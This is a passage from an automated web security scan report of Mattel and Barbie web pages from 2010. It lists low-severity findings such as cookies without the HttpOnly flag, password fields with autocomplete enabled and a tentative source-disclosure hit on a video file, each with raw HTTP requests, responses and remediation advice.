Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":4,"to":3.3,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}
Content-Length: 65

kw=video&search-button.x=0&search-button.y=0&search-button=Search

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:14:21 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b120c09041d; expires=Tuesday, 10-Jan-2079 03:28:28 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 361

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/shop/index.
...[SNIP]...

4.24. http://stats.clear-media.com/in.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.clear-media.com
Path:   /in.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /in.php?site_id=140415&res=1920x1200&lang=en&secure=0&href=%2Fshop%2Findex.jsp%3FcategoryId%3D10811496%26sr%3D1%26origkw%3Dvideo&title=Video%20Collection%20-%20Shop.Mattel.Com&ref=&jsuid=4039987430558971793&mime=js&x=0.3191598958801478 HTTP/1.1
Host: stats.clear-media.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-8+etch6
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: cluid=4039987430558971793; expires=Mon, 23 Dec 2030 00:14:24 GMT; path=/
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 0


4.25. http://tags.mediaforge.com/if/146

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /if/146

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /if/146 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pID=|146,4199678; uID=CsF6Mk0Sky7AdwIeH6r8Ag==

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Thu, 23 Dec 2010 00:14:27 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.7.65
Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/
Content-Length: 1367
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

4.26. http://tags.mediaforge.com/if/146/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /if/146/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /if/146/?prodID=4199678 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Thu, 23 Dec 2010 00:09:18 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.7.65
Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/
Set-Cookie: uID=CsF6Mk0Sky7AdwIeH6r6Ag==; expires=Fri, 23-Dec-11 00:09:18 GMT; domain=.mediaforge.com; path=/
Content-Length: 1367
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

4.27. http://www.barbie.com/videogirl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barbie.com
Path:   /videogirl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videogirl/ HTTP/1.1
Host: www.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wdgjdh55j4yeggemedanpan4; logcookie=2c7468ff-e3a8-450d-8fcc-30c2ae15b5a0; CanadaRedirect=yes; gn_country=US; flashDetected=true; __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:01:01 GMT
Server: MII-WSD/1.4
Cache-Control: private
Pragma: no-cache
Expires: Thu, 23 Dec 2010 00:00:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: NSC_Cbscjf_Xfcgbsn=440af0aa3660;expires=Thu, 23-Dec-10 00:03:28 GMT;path=/
Via: HTTP/1.1 www.barbie.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet (NC)
Content-Type: text/html; charset=utf-8
Content-Length: 25831
Via: 1.1 bfi107106 (MII-APC/1.6)


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<link rel="shortcut icon" href="http://barbie.everythingg
...[SNIP]...

5. Password field with autocomplete enabled
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. https://shop.mattel.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":2,"to":3,"c":"http://shop.mattel.com/product/index.jsp","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"l":"en","i":-1}; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//shop.mattel.com/product/index.jsp%3FproductId%3D4199678_1___1293084613746%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:10:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 56514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<tr>
                   
                       <form name="returningCustomer" onsubmit="valLogin();return false;" action="/coreg/index.jsp" method="post">
<input type="hidden" name="step" VALUE="login">
...[SNIP]...
<br>
                       <input type="password" id="passwd" size="18" name="password" class="pagetext">
                       <br>
...[SNIP]...

5.2. https://shop.mattel.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":2,"to":3,"c":"http://shop.mattel.com/product/index.jsp","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"l":"en","i":-1}; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//shop.mattel.com/product/index.jsp%3FproductId%3D4199678_1___1293084613746%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:10:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 56514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<form name="newCustomer" onsubmit="valSignUp();return false;" action="/agechecker/login.jsp" method="post">-->
                       <form name="newCustomer" onsubmit="valSignUp();return false;" action="/coreg/index.jsp" method="post">
                       <input type="hidden" name="step" value="signup">
...[SNIP]...
<br>
                           <input type="password" id="passwrd" size="18" name="newPassword" class="pagetext">
                           <br>
...[SNIP]...
<br>
                           <input type="password" id="confPasswrd" size="18" name="newPassword2" class="pagetext">
                           
   
                                                                                   <br>
...[SNIP]...

6. Source code disclosure
There are 22 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


6.1. http://mat.imageg.net/cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://mat.imageg.net
Path:   /cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv HTTP/1.1
Host: mat.imageg.net
Proxy-Connection: keep-alive
Referer: http://mat.imageg.net/cms_widgets/38/44/384418_assets/VideosPage.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 21 Dec 2010 00:24:42 GMT
ETag: "2901fd-c2b0d-497e0a9ad0680"
Accept-Ranges: bytes
Content-Length: 797453
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=70775
Expires: Thu, 23 Dec 2010 19:54:02 GMT
Date: Thu, 23 Dec 2010 00:14:27 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@..Q......width.@} .......height.@r.......videodatarate.@.........canSeekToEnd....videocodecid.@........audiodatarate.@X........audiocodecid.@...
...[SNIP]...
f.Q~............y.?....?.....B...h..[.qm..g..V.3o.~..................M.......=.c.W.O....(.2.}....R}......o._...8.....o..b.........t.....p..........g....%.$..%}..6..A.......LBM...A....!.|}.....M..Y..+.....0......Z>.M.....^.a|.......L*.Mq4.2..>.@.    ..h(.coo.G..H)...'E.i...tc...n......1=`K}4':.0....p.Y.A......%.".....bi..H/W..%..v,..rqI...*..f....T{}7....O5.
....53.1C.X........|w...G.j8.`4Rg$Xj#.3.o..Q>,#....R.D..W.......2./...S....R.$.F|.%.k.l.....H....CS....e<1>w..xZ..].c?.%.......
...>..>N..`g.V...k./.1.0.I...x.W.@v.;........._S......pxvi|.X5l.((....n..|a....z$D&..].
...t...hX..W..qm..............yh{.....]..?."..o
8E......./2.6.....]=.g..hr...s..s..'.........O.....M.J.....+.5J..O..jXB(.....<0Yd.m.....6..
I*....dKw.M.b.V.....!...T.`A~$.....r...@.nu..=J.S....:>....H,.F6...e%.......&b... +...A..C...~.......9..5...*.;...*.Sr.e.....Q....1.....C..;gs.>B....7..).....lW......{. .t..#......Q8...r..4.:..R/rq.W.b.u5a?.O..o.N...[LZw. ..8kP.3.\.t.4..o.v.X..M..Om.$...{+.$?_;...o.
../.$.:4..6...%[..d..-..w...:..6d:.......g........N.V2F.`....6g..I.........N.....^...)..N..D:.
........k;.&    .i....i...f...)S.8....6.-;..a..k....x|a5q...H..=....#^w?...;:...[.....Y.o.U?......k...-/....5_......q.....M;...m...e..p....G0q.!u.Gb3m2....L\.........5.
~..&.f..`..    g../.*....h2...j*l...n.@..#...0..{u..E..w.z...<.!.t ...E.k...j.....P?8...J<vDr.{....<.......,....@....._.>/..32....b..ZM..5.o`$.<..g.8.-..+.&..&v.....WD.e...h.@f..5}...".^.V....}.}.e
...Xh..iuq..E.. ...:..v....1......aT45..v.p......
........`...........RtQ......1Nc.W.~...Y...i.X.cA..T..........Lj..+P(.Z.VzG<........Z..L.,[.f'FL+>...6.m....,~...i...P........z...kK.FD.1.6..6.v._Xj.n.RCdYj...).$ .:....Y+.+.'6....1..........W1.j..Q.N
W.a...u.q..K.7.b..A.'.M.#...S.C...P.....}J'.=s...........~s.....F.Ju.z.?l.../<L....o...E._..s....3..@...ZUH    ..V^.....
.HX....8.v..N$.....p=.:Fp..d.ez.i.......2+Qq.&../.qc..Cg.#D1.h>.$x..n........+..........g...?*1.|M.u..#.q........-0..=V.z..k|S<1IN,v....k...&.?'.z./k<...A+HY....0.......1.T...1..*..L.....0V.iSG.E ....0Rm8]0._.*l
J..T..Bv..<Hah).1.}>.`.I..R%...T.u...8#..
..<k.b..3I......=......{4...d....ss.}. ..(.UA..\.4...X...^.l%+I..%|x"....S.CR[....QrC.....P......`.b....s...thmz
.l.....|...g.'...;......Svp4.@..b.. .T....9!.s............1.8uHg.>...BvB.....s.L.P.......~.p.....t.c.YN..r.k\.y.z..5LV!.6
...(.?..w.9..B...9.bbY..2+.. 'c....g.?j;5V......$.....9.S.,.....0......!u..-~...s>.....'x...H...@.L.UV./.Y.B\    ..5.z.        ."E6R.|.........O.....6..VMqs.P.7.....v...H&cPS.I.^....`.X.....{......T..........$9..X.d...6..|..    ..v.r..[.;.....s..f.H.......2.S.2..j..    ..l...4    &w....H).#..Y}.+...@.!.t..........W..V......UL.t......U...k.[`(*.MC%...C...cJ....h..n.Dd........,d../cn.H.Ki./3.
.....L47;...`.._....U.G.......u e..V.\....f.........v[..2s..G.%.......E.........j.'..<{.j.Pxl..W.h....(...... ...y.uM..Me.....G:.:`.....6]a>....N..+.9%W.>.1....@...f..A.T.9...|dPx.n).....%....>.pJ8..{.pm[Q..w..>.ac.npD.a...Mv.QY..Z....S....`d3...c7..t...K-...`.$.w p.......L.R....Nj..a...Fh.'.$8.Wa.....<E...@..{'.`.Z}:&0....N.....5Q..    8.RR..P.^....g..4XP.JA.V....|E..
.......eqVF.%;...!...V    b....5.......U ...d,...[.......J...KN1.U.L..3.H'-.J).Qt@+t].hxqY...cz_......c).j...!c.1Q.K9=.t.H.G...H..!...0.....h..(...\U..nu.fl..F-.......J...1...x.V`.....>.....d.3U&.R...    f.....cb..&.l.!.%..c...+GeN.Kgy..:../*iK$......o.[.T ..m.5
17....I....r....&..v.xs.X.+.........".9zA.iWI.Q,.+X...A.$.q.J..y..h,.....Z..........vA_.4&y.....#/.f......b...6...Rt.    ._Ditm.~N.m8L..c._[.t..p.z.^..eC_.C :.*..g.;.3i........../..9.Gq..}.c.V.....y"....@.....(G.G.W..H..8.S;.Js...Jv8....F..pc{'.$..cz.?U4F.]....j.?N..N........P.....g.O.E:-..s....L#.x2.~~.}W.0.HDS>
...4i..w..d....:P..yf.R.m.3....b..*...v.-QE...6>{.&.
..A ...k..^m...........bs.
.5r~.>j!O....)T{...l...>;.?...j..0\.[.$..9.p....;(............&...r...d.$:..<C..O..x.4~,R....`.MG.J.....j...v#..]C..:\=...........9.h.9..z.d.`.Cqb.x(..z......./."Z..m..|.i..Us.Q/.w.....t..Y.XZ.............<J.9..S..)6......8.w.|4..I.yd.......
}M....An....D.4
~..Qlkl..'..1?..t#.i!8..gO..{.......l.`.N.["._.O=."...E].#....pe....#..u..e.O.7/R..p.3.Awuh>.G.,....bS......K.=u.F....e...4....YY..s.(B#..Nc......f......w...}..X......k_.,.r.(.\...j.x.\........>..,.TJ.S3<.p...I.q.......y.u,...:Zt..v.K...O.v....oy./. ..f.C....e.>..q.B.....-\.H./....G.5.P%..HS...........;xi.j.....T.an...W..d....@Q.31".$..........X.J.....I.d...sr........q....I{...&.U.    .[od.@B>.....ir...C6.MPW...=.&../.sGM.l0.v.6sg.!(..$,..........P$zH%..h!D.2?>@..|. ....f.2............L.:..o.....x[..n.. ..u..v......lP(.2...X.........O..z..y.....e.(2.U.+.E.L...........>.].Y..........N...:.X....C.m...$R....*....E.i..ut.k^E.....<N.t.Y..9..)V..d.....{.J..$.j.o....UD"`L.$.........p2...ZO..F....".i..LIG.wS..QG;J<}Rx#3..*9PR....sn..Ui.....$>}.....A.J..''...B.3.N(.f.....A$4.=.%.yA......c.f!P...m..fd.TLG..d..M.u."...xz......
.....x...,!.....[..*6.m-.....$7.c.~..K...VXZ......m..P.`.cB.e.......4S.K..-!FR'PA`.%l..(...:.......=.
wV.....R.....`.    0k.>c...jD.W6...;.)..*...........3.=.u...@AD.L.w......r.9\...V....u.......0N6. .v..t_qp.n...yOX.v.
.......a.+...2......l......(... BS.p.....XkX...o.?.>..I.....%.Vx.`..!..C.Y.&.'.:!.....$.NM}...$.....:+y.......M.Vt.....[=..U.9.x......3l.U[....C.&,..`A-_.x..x.g..yyx...w.(.{!....pQ.4._...X~....#%...B$4.......R.mS.@].W..zN7.W...8..b........E.......Q.Tl......9.M$.*0....4...6...i...).8.... ....`MT....+h.j....t...;"kG..S..tsoL.a..t.........p.'..y..X....S.c!6...a.^p...G8f.5....w...Y...f....p.!...Cb[..h*A.GU..8.,..K..U....v.g.^7.X.1<......B...A._.z..`=......f.G...../..Y. ...d..h.U.Fw.e:.+V.....EV....T..E..u6..=......"..\..|M .tx....q".|Il..g......../T.'-8..y`.y...s..f..f.l...uJl...;.l^......&xw3..2C.........+.........C.p..-kBy<A1@.W.......g.........g%z.8...{..N.i(S.=...x..C.;_X<'...O.=t...oM.....Xi.....j.A.....-,t.....^..........y..l@`...=..~<...$.......s.B,_...z.+............L.5..f....]LI.<Xt.."..s=.*..2l. .F`...X.;@sGDBu>..J.......e.Cnk.H.7.F....T.<#>.H...k.b..EDPm.....[..iq.f.[.? ..._..ii.f....t.c}. ...V:.a.I.!%.ss.....VrZ..:~......c(/d...n......D.;P..e.....q.......g..<.n.4E.......(....eY.@...r$......Be:.hz..W.,.2..I!...7..h.)j
q...Y...Id:.,......
.Y.....h...4..!r0..Ne@..P...K...c.O.5....NK.:......[b\.r.8p.N....[..u..D..T.U.*.;K.S|
-.G-.$.>..F:-...O.|...#....T..#.../..,Y...}.....2...._.d(.$m....Nc[/?.E..r<a.r2..&.._.p}.=..M.3_}.:_IL.....Tbt..T......M.K..kCS..5=.....@<...tC.......BI.......o..D.q.....[}...p(..1.Jx.V.'J],..5@9...h.^t.......I....c...H....}.7..b.&!./x.C........../..........F.,..6...........s.d........u........3......,....ND..x."7.B....@......&...    }.yD.6...s"A1..[Kd..$....^x.'.q8..nkp..f..VL..*..A..I
..P.dg..*.!.......o~z.H..o...N.)    ..j.8x.Pz......9......`...-....t.....A..5.BG....u.kM...........~.}.Z.7_f..&.Wan.N....@....@..#.e.6....@.d@....N>~..<..Z...?.....d........G;.W.x...u{.*i0..3......R..[....l....j....,<|.'d9..v...4=;O.q.m.."....:..+{...V...zQ...J..Z._.{....m...\&n....m.....D..X..u...6...e....a    .>.WF..|.U<....\..w...\w.p.3Vo@...u.....@.]...ZN..n}.:....k(p_....%.N>jmv0..W=.#..8..n...u..M_E.h.0......`...'!+...B.c.er..3.?%].0.0A.l.CX...t.I.~Oo...kP.......H..N.....t.C;....k.....gw....X,P.1w+n.x.E..>...b<..p.6.my.qg_bO..N..V.p..DO&.
....;...d....,.W jn.v6....o...Z....Q.r1.#brQ.!...d.....%<..l.6..f>......]..3
=./....a..x#....(...>........2...'...p......T.^...rD.........sQ....2cZ....&..:%...w.qJ...)@...fC.x...........aH...Z&.!.?f.....r.r.H\.{......:    uO.....tC..+`A...}...(...v..^c...F.RF...p..d..n;..7.#.{.../F..\...X0.\..sq..E..]F.l..C.l.2.e|.w.8=&..V.......w.(..C...\.S.n.....    s....3#..3.U...A....d.Qt.V..&.y..#....e.....j.......L....7".
~....M9Q)/..5...V.24.#r...;./.9...8...H
&VX.RjU.......BM.    .F{...n.].S.@8'.A\#_5..6.f...-.|.1B.#1.9....o.yF....w.)._.....>3.! ..4.f..|......./...F.T?,\..s..HZ..9...F".h...R..q]}X...B|
&0......w........cS....."............p....w\..L.E.....c..,...........gMyG.F.z..OB.....0.\`.. Gk..{...!.K....#...(+.o,.;.....kL9U)z...*...H...-!.......Ek..C)..L......d..3.../.J.....9.m.n..... (.W....Z..Or>....F.JD.q.u..8....1h.}ea.\..l......).U......I.....-..&... ..B..D.6@.<B..i......:...8M.........UX...{...d.h...,. .....W3.....o....T.....
g..v'.....*u..3..p....){..e...U.@.n)3.....kx..@.".F.y...../......
